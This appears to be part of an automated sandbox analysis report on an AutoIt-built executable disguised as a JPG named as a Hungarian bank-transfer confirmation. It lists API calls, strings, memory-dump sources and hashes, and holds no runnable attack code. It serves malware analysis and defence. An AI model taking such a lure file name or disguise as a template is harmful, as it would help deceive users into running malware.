                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2782032738-0
                                                                                                          • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                          • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                          • _free.LIBCMT ref: 004295A0
                                                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                          • API String ID: 3938964917-569462624
                                                                                                          • Opcode ID: 555983b13ccae5a08c0cf578c9aebbeba2409cdf92c4721f34d488a40831cc57
                                                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                          • Opcode Fuzzy Hash: 555983b13ccae5a08c0cf578c9aebbeba2409cdf92c4721f34d488a40831cc57
                                                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: Error:
                                                                                                          • API String ID: 4104443479-232661952
                                                                                                          • Opcode ID: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                          • Opcode Fuzzy Hash: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                          APIs
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,0040F545,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,004A90E8,C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                          • String ID: X$pWH
                                                                                                          • API String ID: 85490731-941433119
                                                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                          • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                          • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                          Strings
                                                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                          • C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, xrefs: 00410107
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcat
                                                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                          • API String ID: 1765576173-1836073277
                                                                                                          • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                          • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                          APIs
                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Temp$FileNamePath
                                                                                                          • String ID: aut
                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                          • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                          • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                          • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                          • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1794320848-0
                                                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 680241177-0
                                                                                                          • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                          • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 3397143404-0
                                                                                                          • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                          • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                                                          • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                          • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 0043210A
                                                                                                            • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                            • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                          • _free.LIBCMT ref: 0043211D
                                                                                                          • _free.LIBCMT ref: 00432130
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                          • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                                          • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                          • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4163294574-0
                                                                                                          • Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                          • Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                          • _strcat.LIBCMT ref: 0040F786
                                                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3199840319-0
                                                                                                          • Opcode ID: aae4703d1a2fa28cecf8473f78117cc30b5b55eeb427a6342027b9f4f8e6d7f9
                                                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                          • Opcode Fuzzy Hash: aae4703d1a2fa28cecf8473f78117cc30b5b55eeb427a6342027b9f4f8e6d7f9
                                                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
